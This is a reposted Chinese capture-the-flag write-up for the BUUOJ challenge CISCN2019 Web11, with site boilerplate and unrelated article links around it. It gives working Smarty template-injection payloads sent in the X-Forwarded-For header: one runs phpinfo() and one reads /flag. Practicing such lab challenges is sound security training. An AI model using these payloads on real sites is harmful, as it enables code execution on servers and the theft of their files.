C/C++教程
第六十三题——[CISCN2019 华东南赛区]Web11
本文主要是介绍第六十三题——[CISCN2019 华东南赛区]Web11,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
题目地址:https://buuoj.cn/challenges
解题思路
第一步:进入题目,看到提示Smarty,猜测使用模板注入漏洞
第二步:构建漏洞
使用burpsuite改包,添加X-Forwarded-For头,X-Forwarded-For:{if phpinfo()}{/if},发现执行了phpinfo()
第三步:获取flag
使用X-Forwarded-For:{if readfile('/flag')}{/if}获取flag
这篇关于第六十三题——[CISCN2019 华东南赛区]Web11的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
uni-app 中使用 Vant Weapp,怎么安装和配置npm ?-icode9专业技术文章分享12-29
-
Nacos多环境配置学习入门12-27
-
Nacos快速入门学习入门12-27
-
Nacos快速入门学习入门12-27
-
Nacos配置中心学习入门指南12-27
-
Nacos配置中心学习入门12-27
-
Nacos做项目隔离学习入门12-27
-
Nacos做项目隔离学习入门12-27
-
Nacos初识学习入门:轻松掌握服务发现与配置管理12-27
-
Nacos初识学习入门:轻松掌握Nacos基础操作12-27
-
Nacos多环境配置学习入门12-27
-
阿里云ECS学习入门:新手必看教程12-27
-
阿里云ECS新手入门指南:轻松搭建您的第一台云服务器12-27
-
Nacos做项目隔离:简单教程与实践指南12-27
-
阿里云ECS学习:新手入门指南12-27
栏目导航
